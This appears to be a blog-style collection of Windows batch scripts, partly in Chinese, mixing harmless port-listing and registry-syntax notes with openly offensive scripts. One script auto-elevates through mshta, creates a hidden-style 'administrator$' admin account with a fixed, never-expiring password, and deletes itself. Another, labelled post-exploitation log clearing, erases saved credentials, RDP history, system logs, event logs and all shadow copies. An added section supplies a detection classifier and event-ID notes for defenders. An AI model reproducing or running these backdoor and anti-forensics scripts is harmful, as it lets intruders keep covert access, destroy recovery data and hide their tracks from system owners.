reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced"  /d 0 /v "Start_TrackProgs" /t REG_DWORD /f

BAT troubleshooting scripts

Remote Desktop reports "function not supported"

REG ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\CredSSP\Parameters\ /v AllowEncryptionOracle /t REG_DWORD /d 2

Create an account that never expires

@echo off
### Run cmd as administrator
%1 mshta vbscript:CreateObject("Shell.Application").ShellExecute("cmd.exe","/c %~s0 ::","","runas",1)(window.close)&&exit
cd /d "%~dp0"
### Add the account
net user administrator$ " Zz5985768..  " /add
### Add it to the administrators group
net localgroup administrators administrator$ /add
### Set the account password to never expire
wmic useraccount where "Name='administrator$'" set PasswordExpires=False
### Delete this script (add$.bat)
del add$.bat
pause

View the open ports on this machine

@echo off
color 1f
Title XP端口-进程查询
setlocal enabledelayedexpansion
echo ╔- -╗
echo 本机开放的端口及使用该端口的进程
echo ╚- -╝
echo ------------------------------------
echo 端口号 进程名称
ECHO TCP协议:
:: Use the netstat command to find the ports communicating over TCP and split the output;
:: pass the second field (IP plus port) to %%i and the fifth field (PID) to %%j;
for /F "usebackq skip=4 tokens=2,5" %%i in (`"netstat -ano -p TCP"`) do (
call :Assoc %%i TCP %%j
echo !TCP_Port! !TCP_Proc_Name!
)

ECHO UDP协议:
for /F "usebackq skip=4 tokens=2,4" %%i in (`"netstat -ano -p UDP"`) do (
call :Assoc %%i UDP %%j
echo !UDP_Port! !UDP_Proc_Name!
)
echo 按任意键退出
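pause>nul
:: Stop here so execution does not fall through into the :Assoc subroutine
goto :eof

:Assoc
:: Split %1 (the first argument) and pass its second field to %%e. In this script %1 is the %%i above (in the form IP:port)
for /F "tokens=2 delims=:" %%e in ("%1") do (
set %2_Port=%%e
)
:: Look up the process whose PID equals %3 (the third argument) and store the result in the variable ?_Proc_Name, where ? stands for UDP or TCP;
for /F "skip=2 usebackq delims=, tokens=1" %%a in (`"Tasklist /FI "PID eq %3" /FO CSV"`) do (
:: %%~a strips the quotes around %%a, because the output of the command above is wrapped in quotes.
set %2_Proc_Name=%%~a
)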

Post-exploitation log clearing

@ECHO OFF

%1 mshta vbscript:CreateObject("Shell.Application").ShellExecute("cmd.exe","/c %~s0 ::","","runas",1)(window.close)&&exit
cd /d "%~dp0"

rem cmdkey: list the remote host information saved locally
cmdkey.exe /list > %userprofile%\1.txt
findstr.exe target %userprofile%\1.txt > %userprofile%\2.txt

rem Loop over the credentials and delete them
FOR /F "tokens=2 delims==" %%G IN (%userprofile%\2.txt) DO cmdkey.exe /delete %%G
DEL %userprofile%\1.txt
DEL %userprofile%\2.txt

rem Clear this machine's remote logon records
Reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f
Reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f
Reg add   "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers"

rem Delete Remote Desktop records
cd %userprofile%\documents\
Attrib Default.rdp -s -h
DEL /F /S /Q /A Default.rdp
cd %userprofile%\mydocuments\
Attrib Default.rdp -s -h
DEL /F /S /Q /A Default.rdp

rem Delete log files
DEL /F /S /Q /A  %SystemRoot%\System32\LogFiles\*.*
DEL /F /S /Q /A  %SystemRoot%\System32\config\*.evt
DEL /F /S /Q /A  %SystemRoot%\System32\dtclog\*.*
DEL /F /S /Q /A  %SystemRoot%\System32\*.log
DEL /F /S /Q /A  %SystemRoot%\System32\*.txt
DEL /F /S /Q /A  %SystemRoot%\*.txt
DEL /F /S /Q /A  %SystemRoot%\*.log

rem Delete shadow copies
vssadmin delete shadows /all /quiet

rem Delete the records in Event Viewer
rem Method 1
wevtutil cl "System"
wevtutil cl "Application"
wevtutil cl "Security"
rem Method 2
DEL /F /S /Q /A  %SystemRoot%\System32\Winevt\Logs\System.evtx
DEL /F /S /Q /A  %SystemRoot%\System32\Winevt\Logs\Security.evtx
DEL /F /S /Q /A  %SystemRoot%\System32\Winevt\Logs\Application.evtx
rem Method 3
PowerShell -Command "& {Clear-Eventlog -Log Application,System,Security}"

rem Delete Quick Access records
cd %AppData%\Microsoft\Windows\Recent\AutomaticDestinations
DEL /F /S /Q /A 1bc392b8e104a00e.automaticDestinations-ms
cd c:\Users\%Username%\AppData\Roaming\Microsoft\Windows\Recent
cls
Erase /f *.*
exit
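
Seen from the monitoring side, each step of the script above leaves a recognisable command line in process-creation logging. The following is an added example, not part of the original post: a small classifier that tags command lines matching the clearing commands used above. The "host|user|command line" input format, the function names and every sample line are constructed for this illustration.

```bash
#!/bin/bash
# Added example (detection side): tag process command lines that match the
# record-clearing commands shown in the script above.
# The input format and all sample lines are constructed, not real telemetry.

# usage: classify_cmdline "command line"  -> prints a tag, or nothing
classify_cmdline() {
    local lc
    # Windows command lines are case-insensitive, so compare in lower case.
    lc=$(printf '%s' "$1" | tr '[:upper:]' '[:lower:]')
    case $lc in
        *wevtutil*' cl '*|*wevtutil*' clear-log '*) echo eventlog-cleared ;;
        *clear-eventlog*)                           echo eventlog-cleared ;;
        *del*'\winevt\logs\'*.evtx*)                echo eventlog-file-deleted ;;
        *vssadmin*delete*shadows*)                  echo shadow-copies-deleted ;;
        *cmdkey*/delete*)                           echo stored-credentials-deleted ;;
        *reg*delete*'terminal server client'*)      echo rdp-history-deleted ;;
    esac
}

# usage: scan_events < FILE   (lines of "host|user|command line")
# Prints "host user tag" for every line that matches.
scan_events() {
    local host user cmd tag
    while IFS='|' read -r host user cmd; do
        tag=$(classify_cmdline "$cmd")
        if [ -n "$tag" ]; then
            printf '%s %s %s\n' "$host" "$user" "$tag"
        fi
    done
    return 0
}

# Constructed sample: benign look-alikes are mixed in on purpose.
sample_events() {
    cat <<'EOF'
WS-014|alice|wevtutil cl "Security"
WS-014|alice|wevtutil el
SRV-02|svc_backup|vssadmin list shadows
SRV-02|admin|vssadmin delete shadows /all /quiet
WS-020|bob|PowerShell -Command "& {Clear-Eventlog -Log Application,System,Security}"
WS-020|bob|cmdkey.exe /list
WS-020|bob|cmdkey.exe /delete:fileserver01
WS-021|carol|reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f
WS-022|dave|DEL /F /S /Q /A C:\Windows\System32\Winevt\Logs\Security.evtx
EOF
}

demo() {
    sample_events | scan_events
}

demo
```

Independently of command-line logging, Windows itself records event 1102 in the Security log when that log is cleared and event 104 in the System log when another log is cleared, so forwarding those two events off the host keeps a trace even after the local logs are emptied.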

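Working with the registry from bat scripts

Query a registry entry: reg query
Delete a registry entry: reg delete
Add a registry entry: reg add

### Example: modify the registry so that the cmd window does not remember history
reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced"  /d 0 /v "Start_TrackProgs" /t REG_DWORD /f

The syntax is as follows:
/v ValueName: the name of the registry entry to add under the specified subkey.
/t Type: the type of the registry entry. Type must be one of the following:

  • REG_SZ
  • REG_MULTI_SZ
  • REG_DWORD_BIG_ENDIAN
  • REG_DWORD
  • REG_BINARY
  • REG_DWORD_LITTLE_ENDIAN
  • REG_LINK
  • REG_FULL_RESOURCE_DESCRIPTOR
  • REG_EXPAND_SZ

/d Data: the data for the new registry entry.
/f: add the registry entry without asking for confirmation.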